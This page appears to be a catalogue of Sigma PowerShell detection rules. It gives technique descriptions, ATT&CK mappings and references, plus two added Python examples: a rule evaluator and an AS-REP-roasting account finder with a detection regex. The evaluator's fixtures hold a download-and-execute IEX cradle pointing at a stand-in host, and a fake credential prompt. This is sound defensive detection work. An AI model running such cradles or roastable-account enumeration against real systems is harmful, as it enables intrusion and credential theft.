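The four entries above (Suspicious PowerShell Download, PowerShell Credential Prompt, Execute Invoke-command on Remote Host and Powershell Add Name Resolution Policy Table Rule) all match on ScriptBlockText from Event ID 4104. The following added Python example, written for this page and not taken from the Sigma project, evaluates rules written in Sigma's own shape (field|modifier keys, `contains`, `contains|all`, `re`, and the condition "all of selection*") over constructed 4104 records. The selections are this editor's approximations of the four rules, not their exact detection sections, and the events are constructed.

```python
import re

# Editor's approximations of four rules from this section, in Sigma's shape:
# each key is "<field>|<modifiers>", and the condition is "all of selection*".
RULES = [
    {"title": "Suspicious PowerShell Download - Powershell Script",
     "detection": {
         "selection_client": {"ScriptBlockText|contains": "System.Net.WebClient"},
         "selection_method": {"ScriptBlockText|contains": [".DownloadFile(", ".DownloadString("]},
     }},
    {"title": "PowerShell Credential Prompt",
     "detection": {"selection": {"ScriptBlockText|contains": "PromptForCredential"}}},
    {"title": "Execute Invoke-command on Remote Host",
     "detection": {"selection": {"ScriptBlockText|contains|all": ["Invoke-Command", "-ComputerName"]}}},
    {"title": "Powershell Add Name Resolution Policy Table Rule",
     "detection": {"selection": {"ScriptBlockText|contains|all": ["Add-DnsClientNrptRule", "-Namespace", "-NameServers"]}}},
]


def field_matches(event, spec, values):
    """Apply one 'field|modifiers' entry to an event."""
    field, *mods = spec.split("|")
    text = str(event.get(field, ""))
    values = [values] if isinstance(values, str) else list(values)
    if "re" in mods:
        hits = [re.search(v, text) is not None for v in values]
    else:
        # Sigma string matching is case-insensitive by default.
        hits = [v.lower() in text.lower() for v in values]
    return all(hits) if "all" in mods else any(hits)


def selection_matches(event, selection):
    # Fields inside one selection block are ANDed.
    return all(field_matches(event, spec, vals) for spec, vals in selection.items())


def rule_matches(event, rule):
    # Condition "all of selection*": every selection block must match.
    return all(selection_matches(event, sel) for sel in rule["detection"].values())


def run_rules(events, rules=RULES):
    """Return (RecordId, rule title) pairs for every event/rule hit."""
    return [(e["RecordId"], r["title"]) for e in events for r in rules if rule_matches(e, r)]


# Constructed Event ID 4104 records carrying only the fields the rules need.
EVENTS = [
    {"RecordId": 1, "EventID": 4104,
     "ScriptBlockText": "IEX (New-Object System.Net.WebClient).DownloadString('http://example.invalid/a.ps1')"},
    {"RecordId": 2, "EventID": 4104,
     "ScriptBlockText": "$c = $Host.UI.PromptForCredential('Update', 'Enter password', $env:USERNAME, '')"},
    {"RecordId": 3, "EventID": 4104,
     "ScriptBlockText": "Invoke-Command -ComputerName srv01 -ScriptBlock { whoami }"},
    {"RecordId": 4, "EventID": 4104,
     "ScriptBlockText": "Add-DnsClientNrptRule -Namespace '.corp.example' -NameServers '10.0.0.53'"},
    # WebClient without a download method: matches one selection, not both.
    {"RecordId": 5, "EventID": 4104,
     "ScriptBlockText": "$wc = New-Object System.Net.WebClient; $wc.Headers.Add('X-Test', '1')"},
]

if __name__ == "__main__":
    for record_id, title in run_rules(EVENTS):
        print(record_id, title)
```

Record 5 is the useful negative case: it contains `System.Net.WebClient` but no `.DownloadFile(`/`.DownloadString(`, so the download rule's second selection fails and the event is not reported, which is exactly what "all of selection*" buys over a single keyword list.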

Malicious PowerShell Keywords

Detects keywords from well-known PowerShell exploitation frameworks

The tag is: misp-galaxy:sigma-rules="Malicious PowerShell Keywords"

Malicious PowerShell Keywords has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 9709. Table References

Links

https://adsecurity.org/?p=2921

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_malicious_keywords.yml

PowerShell Set-Acl On Windows Folder - PsScript

Detects PowerShell scripts to set the ACL to a file in the Windows folder

The tag is: misp-galaxy:sigma-rules="PowerShell Set-Acl On Windows Folder - PsScript"

PowerShell Set-Acl On Windows Folder - PsScript has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="File and Directory Permissions Modification - T1222" with estimative-language:likelihood-probability="almost-certain"

Table 9710. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/74438b0237d141ee9c99747976447dc884cb1a39/atomics/T1505.005/T1505.005.md

https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.security/set-acl?view=powershell-5.1

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_set_acl_susp_location.yml

Invoke-Obfuscation VAR+ Launcher - PowerShell

Detects Obfuscated use of Environment Variables to execute PowerShell

The tag is: misp-galaxy:sigma-rules="Invoke-Obfuscation VAR+ Launcher - PowerShell"

Invoke-Obfuscation VAR+ Launcher - PowerShell has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 9711. Table References

Links

https://github.com/SigmaHQ/sigma/issues/1009

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_invoke_obfuscation_var.yml

AD Groups Or Users Enumeration Using PowerShell - ScriptBlock

Adversaries may attempt to find domain-level groups and permission settings. The knowledge of domain-level permission groups can help adversaries determine which groups exist and which users belong to a particular group. Adversaries may use this information to determine which users have elevated permissions, such as domain administrators.

The tag is: misp-galaxy:sigma-rules="AD Groups Or Users Enumeration Using PowerShell - ScriptBlock"

AD Groups Or Users Enumeration Using PowerShell - ScriptBlock has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Local Groups - T1069.001" with estimative-language:likelihood-probability="almost-certain"

Table 9712. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.002/T1069.002.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_ad_group_reco.yml

PowerShell Write-EventLog Usage

Detects usage of the "Write-EventLog" cmdlet with the 'RawData' parameter. The cmdlet can be leveraged to write malicious payloads into the event log and retrieve them later.

The tag is: misp-galaxy:sigma-rules="PowerShell Write-EventLog Usage"

Table 9713. Table References

Links

https://www.blackhillsinfosec.com/windows-event-logs-for-red-teams/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_write_eventlog.yml

Potential Active Directory Enumeration Using AD Module - PsScript

Detects usage of the "Import-Module" cmdlet to load the "Microsoft.ActiveDirectory.Management.dll" DLL, which is often used by attackers to perform AD enumeration without RSAT being installed.

The tag is: misp-galaxy:sigma-rules="Potential Active Directory Enumeration Using AD Module - PsScript"

Table 9714. Table References

Links

https://twitter.com/cyb3rops/status/1617108657166061568?s=20

https://github.com/samratashok/ADModule

https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/active-directory-enumeration-with-ad-module-without-rsat-or-admin-privileges

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_active_directory_module_dll_import.yml

PowerShell ADRecon Execution

Detects execution of ADRecon.ps1 for AD reconnaissance which has been reported to be actively used by FIN7

The tag is: misp-galaxy:sigma-rules="PowerShell ADRecon Execution"

PowerShell ADRecon Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 9715. Table References

Links

https://bi-zone.medium.com/from-pentest-to-apt-attack-cybercriminal-group-fin7-disguises-its-malware-as-an-ethical-hackers-c23c9a75e319

https://github.com/sense-of-security/ADRecon/blob/11881a24e9c8b207f31b56846809ce1fb189bcc9/ADRecon.ps1

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_adrecon_execution.yml

Suspicious GPO Discovery With Get-GPO

Detect use of Get-GPO to get one GPO or all the GPOs in a domain.

The tag is: misp-galaxy:sigma-rules="Suspicious GPO Discovery With Get-GPO"

Suspicious GPO Discovery With Get-GPO has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Group Policy Discovery - T1615" with estimative-language:likelihood-probability="almost-certain"

Table 9716. Table References

Links

https://docs.microsoft.com/en-us/powershell/module/grouppolicy/get-gpo?view=windowsserver2022-ps

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1615/T1615.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_get_gpo.yml

Disable-WindowsOptionalFeature Command PowerShell

Detects the built-in PowerShell cmdlet Disable-WindowsOptionalFeature from the Deployment Image Servicing and Management (DISM) module. Similar to DISM.exe, this cmdlet is used to enumerate, install, uninstall, configure, and update features and packages in Windows images.

The tag is: misp-galaxy:sigma-rules="Disable-WindowsOptionalFeature Command PowerShell"

Disable-WindowsOptionalFeature Command PowerShell has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"

Table 9717. Table References

Links

https://docs.microsoft.com/en-us/powershell/module/dism/disable-windowsoptionalfeature?view=windowsserver2022-ps

https://github.com/redcanaryco/atomic-red-team/blob/5b67c9b141fa3918017f8fa44f2f88f0b1ecb9e1/atomics/T1562.001/T1562.001.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_disable_windows_optional_feature.yml

Powershell LocalAccount Manipulation

Adversaries may manipulate accounts to maintain access to victim systems. Account manipulation may consist of any action that preserves adversary access to a compromised account, such as modifying credentials or permission groups

The tag is: misp-galaxy:sigma-rules="Powershell LocalAccount Manipulation"

Powershell LocalAccount Manipulation has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Account Manipulation - T1098" with estimative-language:likelihood-probability="almost-certain"

Table 9718. Table References

Links

https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.localaccounts/?view=powershell-5.1

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1098/T1098.md#atomic-test-1---admin-account-manipulate

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_localuser.yml

PowerShell ICMP Exfiltration

Detects Exfiltration Over Alternative Protocol - ICMP. Adversaries may steal data by exfiltrating it over an unencrypted network protocol other than that of the existing command and control channel.

The tag is: misp-galaxy:sigma-rules="PowerShell ICMP Exfiltration"

PowerShell ICMP Exfiltration has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Exfiltration Over Unencrypted Non-C2 Protocol - T1048.003" with estimative-language:likelihood-probability="almost-certain"

Table 9719. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1048.003/T1048.003.md#atomic-test-2---exfiltration-over-alternative-protocol---icmp

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_icmp_exfiltration.yml

Silence.EDA Detection

Detects Silence EmpireDNSAgent as described in the Group-IB report

The tag is: misp-galaxy:sigma-rules="Silence.EDA Detection"

Silence.EDA Detection has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="DNS - T1071.004" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Protocol Tunneling - T1572" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="System Shutdown/Reboot - T1529" with estimative-language:likelihood-probability="almost-certain"

Table 9720. Table References

Links

https://www.group-ib.com/resources/threat-research/silence_2.0.going_global.pdf

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_apt_silence_eda.yml

Testing Usage of Uncommonly Used Port

Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088 (Citation: Symantec Elfin Mar 2019) or port 587 (Citation: Fortinet Agent Tesla April 2018) as opposed to the traditional port 443.

The tag is: misp-galaxy:sigma-rules="Testing Usage of Uncommonly Used Port"

Testing Usage of Uncommonly Used Port has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Non-Standard Port - T1571" with estimative-language:likelihood-probability="almost-certain"

Table 9721. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1571/T1571.md#atomic-test-1---testing-usage-of-uncommonly-used-port-with-powershell

https://docs.microsoft.com/en-us/powershell/module/nettcpip/test-netconnection?view=windowsserver2022-ps

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_test_netconnection.yml

PowerShell Hotfix Enumeration

Detects calls to "Win32_QuickFixEngineering" in order to enumerate installed hotfixes, which is often used in "enum" scripts by attackers

The tag is: misp-galaxy:sigma-rules="PowerShell Hotfix Enumeration"

Table 9722. Table References

Links

https://github.com/411Hall/JAWS/blob/233f142fcb1488172aa74228a666f6b3c5c48f1d/jaws-enum.ps1

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_hotfix_enum.yml

Replace Desktop Wallpaper by Powershell

An adversary may deface systems internal to an organization in an attempt to intimidate or mislead users. This may take the form of modifications to internal websites, or directly to user systems with the replacement of the desktop wallpaper

The tag is: misp-galaxy:sigma-rules="Replace Desktop Wallpaper by Powershell"

Replace Desktop Wallpaper by Powershell has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Internal Defacement - T1491.001" with estimative-language:likelihood-probability="almost-certain"

Table 9723. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1491.001/T1491.001.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_wallpaper.yml

Potential WinAPI Calls Via PowerShell Scripts

Detects use of WinAPI functions in PowerShell scripts

The tag is: misp-galaxy:sigma-rules="Potential WinAPI Calls Via PowerShell Scripts"

Potential WinAPI Calls Via PowerShell Scripts has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Native API - T1106" with estimative-language:likelihood-probability="almost-certain"

Table 9724. Table References

Links

https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_win_api_susp_access.yml

Potential AMSI Bypass Script Using NULL Bits

Detects usage of special strings/null bits in order to potentially bypass AMSI functionalities

The tag is: misp-galaxy:sigma-rules="Potential AMSI Bypass Script Using NULL Bits"

Potential AMSI Bypass Script Using NULL Bits has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"

Table 9725. Table References

Links

https://github.com/r00t-3xp10it/hacking-material-books/blob/43cb1e1932c16ff1f58b755bc9ab6b096046853f/obfuscation/simple_obfuscation.md#amsi-bypass-using-null-bits-satoshi

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_amsi_null_bits_bypass.yml

Live Memory Dump Using Powershell

Detects usage of a PowerShell command to dump the live memory of a Windows machine

The tag is: misp-galaxy:sigma-rules="Live Memory Dump Using Powershell"

Live Memory Dump Using Powershell has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="OS Credential Dumping - T1003" with estimative-language:likelihood-probability="almost-certain"

Table 9726. Table References

Links

https://docs.microsoft.com/en-us/powershell/module/storage/get-storagediagnosticinfo

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_memorydump_getstoragediagnosticinfo.yml

AADInternals PowerShell Cmdlets Execution - PsScript

Detects AADInternals cmdlet execution. AADInternals is a tool for administering Azure AD and Office 365 that can be abused by threat actors to attack Azure AD or Office 365.

The tag is: misp-galaxy:sigma-rules="AADInternals PowerShell Cmdlets Execution - PsScript"

Table 9727. Table References

Links

https://o365blog.com/aadinternals/

https://github.com/Gerenios/AADInternals

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_aadinternals_cmdlets_execution.yml

Invoke-Obfuscation RUNDLL LAUNCHER - PowerShell

Detects Obfuscated Powershell via RUNDLL LAUNCHER

The tag is: misp-galaxy:sigma-rules="Invoke-Obfuscation RUNDLL LAUNCHER - PowerShell"

Invoke-Obfuscation RUNDLL LAUNCHER - PowerShell has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 9728. Table References

Links

https://github.com/SigmaHQ/sigma/issues/1009

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_invoke_obfuscation_via_rundll.yml

Potential PowerShell Obfuscation Using Alias Cmdlets

Detects Set-Alias or New-Alias cmdlet usage, which can be used as a means to obfuscate PowerShell scripts

The tag is: misp-galaxy:sigma-rules="Potential PowerShell Obfuscation Using Alias Cmdlets"

Potential PowerShell Obfuscation Using Alias Cmdlets has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 9729. Table References

Links

https://github.com/1337Rin/Swag-PSO

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_set_alias.yml

Suspicious New-PSDrive to Admin Share

Adversaries may use valid accounts to interact with a remote network share using Server Message Block (SMB). The adversary may then perform actions as the logged-on user.

The tag is: misp-galaxy:sigma-rules="Suspicious New-PSDrive to Admin Share"

Suspicious New-PSDrive to Admin Share has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="SMB/Windows Admin Shares - T1021.002" with estimative-language:likelihood-probability="almost-certain"

Table 9730. Table References

Links

https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/new-psdrive?view=powershell-7.2

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1021.002/T1021.002.md#atomic-test-2---map-admin-share-powershell

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_new_psdrive.yml

Request A Single Ticket via PowerShell

Utilizes native PowerShell Identity modules to query the domain and extract the Service Principal Names for a single computer. This behavior is typically used during a Kerberoasting or Silver Ticket attack. A successful execution will output the SPNs for the endpoint in question.

The tag is: misp-galaxy:sigma-rules="Request A Single Ticket via PowerShell"

Request A Single Ticket via PowerShell has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Kerberoasting - T1558.003" with estimative-language:likelihood-probability="almost-certain"

Table 9731. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1558.003/T1558.003.md#atomic-test-4---request-a-single-ticket-via-powershell

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_request_kerberos_ticket.yml

NTFS Alternate Data Stream

Detects writing data into NTFS alternate data streams from powershell. Needs Script Block Logging.

The tag is: misp-galaxy:sigma-rules="NTFS Alternate Data Stream"

NTFS Alternate Data Stream has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="NTFS File Attributes - T1564.004" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 9732. Table References

Links

http://www.powertheshell.com/ntfsstreams/

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.004/T1564.004.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_ntfs_ads_access.yml

Get-ADUser Enumeration Using UserAccountControl Flags

Detects enumeration of accounts that do not require Kerberos pre-authentication, the reconnaissance step of AS-REP roasting, an attack that is often overlooked. It is not very common because accounts have to be explicitly configured to not require pre-authentication.

The tag is: misp-galaxy:sigma-rules="Get-ADUser Enumeration Using UserAccountControl Flags"

Get-ADUser Enumeration Using UserAccountControl Flags has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"

Table 9733. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.002/T1069.002.md#atomic-test-11---get-aduser-enumeration-using-useraccountcontrol-flags-as-rep-roasting

https://shellgeek.com/useraccountcontrol-flags-to-manipulate-properties/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_as_rep_roasting.yml
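The entry above hinges on one bit of the userAccountControl attribute: DONT_REQ_PREAUTH (0x400000, decimal 4194304), which is why the atomic test filters on that literal. The following added Python example, written for this page and not part of the Sigma rule or the atomic test, decodes userAccountControl bitmasks into flag names, lists which accounts in a constructed directory sample are actually AS-REP roastable (pre-authentication disabled and the account enabled), and flags script blocks that test that bit. The flag values are the documented ADS_USER_FLAG_ENUM constants; the detection regex and the sample accounts are this editor's assumptions.

```python
import re

# userAccountControl bit flags (ADS_USER_FLAG_ENUM values as documented by Microsoft).
UAC_FLAGS = {
    0x0000001: "SCRIPT",
    0x0000002: "ACCOUNTDISABLE",
    0x0000008: "HOMEDIR_REQUIRED",
    0x0000010: "LOCKOUT",
    0x0000020: "PASSWD_NOTREQD",
    0x0000040: "PASSWD_CANT_CHANGE",
    0x0000080: "ENCRYPTED_TEXT_PWD_ALLOWED",
    0x0000200: "NORMAL_ACCOUNT",
    0x0000800: "INTERDOMAIN_TRUST_ACCOUNT",
    0x0001000: "WORKSTATION_TRUST_ACCOUNT",
    0x0002000: "SERVER_TRUST_ACCOUNT",
    0x0010000: "DONT_EXPIRE_PASSWORD",
    0x0040000: "SMARTCARD_REQUIRED",
    0x0080000: "TRUSTED_FOR_DELEGATION",
    0x0100000: "NOT_DELEGATED",
    0x0200000: "USE_DES_KEY_ONLY",
    0x0400000: "DONT_REQ_PREAUTH",
    0x0800000: "PASSWORD_EXPIRED",
    0x1000000: "TRUSTED_TO_AUTH_FOR_DELEGATION",
}
DONT_REQ_PREAUTH = 0x400000  # 4194304, the literal used in the atomic test
ACCOUNTDISABLE = 0x2


def decode_uac(value: int) -> list:
    """Names of the flags set in a userAccountControl value, lowest bit first."""
    return [name for bit, name in sorted(UAC_FLAGS.items()) if value & bit]


def is_asrep_roastable(uac: int) -> bool:
    # Only enabled accounts with pre-authentication disabled yield a usable AS-REP.
    return bool(uac & DONT_REQ_PREAUTH) and not (uac & ACCOUNTDISABLE)


def find_asrep_roastable(accounts) -> list:
    return [a["sAMAccountName"] for a in accounts
            if is_asrep_roastable(a["userAccountControl"])]


# Editor's approximation of the script-block shapes the rule targets: Get-ADUser
# with a filter that tests the DONT_REQ_PREAUTH bit by decimal, hex, or the
# friendly property name (the LDAP bitwise-AND matching-rule form
# "userAccountControl:1.2.840.113556.1.4.803:=4194304" carries the decimal).
ASREP_ENUM = re.compile(
    r"Get-ADUser\b.*?(?:4194304|0x400000|DoesNotRequirePreAuth)", re.I | re.S
)


def detect_asrep_enum(script_block: str) -> bool:
    return ASREP_ENUM.search(script_block) is not None


# Constructed directory sample (not real accounts).
SAMPLE_ACCOUNTS = [
    {"sAMAccountName": "jdoe", "userAccountControl": 0x200},
    {"sAMAccountName": "svc-legacy", "userAccountControl": 0x200 | 0x10000 | 0x400000},
    {"sAMAccountName": "old-admin", "userAccountControl": 0x200 | 0x2 | 0x400000},
]

if __name__ == "__main__":
    for acct in SAMPLE_ACCOUNTS:
        print(acct["sAMAccountName"], decode_uac(acct["userAccountControl"]))
    print("roastable:", find_asrep_roastable(SAMPLE_ACCOUNTS))
    print(detect_asrep_enum(
        "Get-ADUser -Filter 'useraccountcontrol -band 4194304' -Properties useraccountcontrol"))
```

Running `find_asrep_roastable` against an export of your own domain's userAccountControl values is the defender's version of the atomic test: `old-admin` is excluded because a disabled account cannot obtain an AS-REP, while `svc-legacy` is the one that would yield a crackable encrypted timestamp.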

Powershell Create Scheduled Task

Adversaries may abuse the Windows Task Scheduler to perform task scheduling for initial or recurring execution of malicious code

The tag is: misp-galaxy:sigma-rules="Powershell Create Scheduled Task"

Powershell Create Scheduled Task has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"

Table 9734. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1053.005/T1053.005.md#atomic-test-6---wmi-invoke-cimmethod-scheduled-task

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1053.005/T1053.005.md#atomic-test-4---powershell-cmdlet-scheduled-task

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_cmdlet_scheduled_task.yml

Powershell Timestomp

Adversaries may modify file time attributes to hide new files or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder.

The tag is: misp-galaxy:sigma-rules="Powershell Timestomp"

Powershell Timestomp has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Timestomp - T1070.006" with estimative-language:likelihood-probability="almost-certain"

Table 9735. Table References

Links

https://www.offensive-security.com/metasploit-unleashed/timestomp/

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.006/T1070.006.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_timestomp.yml

PowerShell PSAttack

Detects the use of PSAttack PowerShell hack tool

The tag is: misp-galaxy:sigma-rules="PowerShell PSAttack"

PowerShell PSAttack has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 9736. Table References

Links

https://adsecurity.org/?p=2921

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_psattack.yml

Suspicious Hyper-V Cmdlets

Adversaries may carry out malicious operations using a virtual instance to avoid detection

The tag is: misp-galaxy:sigma-rules="Suspicious Hyper-V Cmdlets"

Suspicious Hyper-V Cmdlets has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Run Virtual Instance - T1564.006" with estimative-language:likelihood-probability="almost-certain"

Table 9737. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.006/T1564.006.md#atomic-test-3---create-and-start-hyper-v-virtual-machine

https://docs.microsoft.com/en-us/virtualization/hyper-v-on-windows/quick-start/enable-hyper-v

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_hyper_v_condlet.yml

Service Registry Permissions Weakness Check

Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services. Adversaries may use flaws in Registry permissions to redirect from the originally specified executable to one that they control, in order to launch their own code at service start. Windows stores local service configuration information in the Registry under HKLM\SYSTEM\CurrentControlSet\Services

The tag is: misp-galaxy:sigma-rules="Service Registry Permissions Weakness Check"

Service Registry Permissions Weakness Check has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Services Registry Permissions Weakness - T1574.011" with estimative-language:likelihood-probability="almost-certain"

Table 9738. Table References

Links

https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.security/get-acl?view=powershell-7.2

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1574.011/T1574.011.md#atomic-test-1---service-registry-permissions-weakness

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_get_acl_service.yml

Create Volume Shadow Copy with Powershell

Adversaries may attempt to access or create a copy of the Active Directory domain database in order to steal credential information

The tag is: misp-galaxy:sigma-rules="Create Volume Shadow Copy with Powershell"

Create Volume Shadow Copy with Powershell has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="NTDS - T1003.003" with estimative-language:likelihood-probability="almost-certain"

Table 9739. Table References

Links

https://attack.mitre.org/datasources/DS0005/

https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/get-wmiobject?view=powershell-5.1&viewFallbackFrom=powershell-7

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_create_volume_shadow_copy.yml

Veeam Backup Servers Credential Dumping Script Execution

Detects execution of a PowerShell script that contains calls to the "Veeam.Backup" class, in order to dump stored credentials.

The tag is: misp-galaxy:sigma-rules="Veeam Backup Servers Credential Dumping Script Execution"

Table 9740. Table References

Links

https://www.pwndefend.com/2021/02/15/retrieving-passwords-from-veeam-backup-servers/

https://labs.withsecure.com/publications/fin7-target-veeam-servers

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_veeam_credential_dumping_script.yml

Enable Windows Remote Management

Adversaries may use Valid Accounts to interact with remote systems using Windows Remote Management (WinRM). The adversary may then perform actions as the logged-on user.

The tag is: misp-galaxy:sigma-rules="Enable Windows Remote Management"

Enable Windows Remote Management has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Remote Management - T1021.006" with estimative-language:likelihood-probability="almost-certain"

Table 9741. Table References

Links

https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/enable-psremoting?view=powershell-7.2

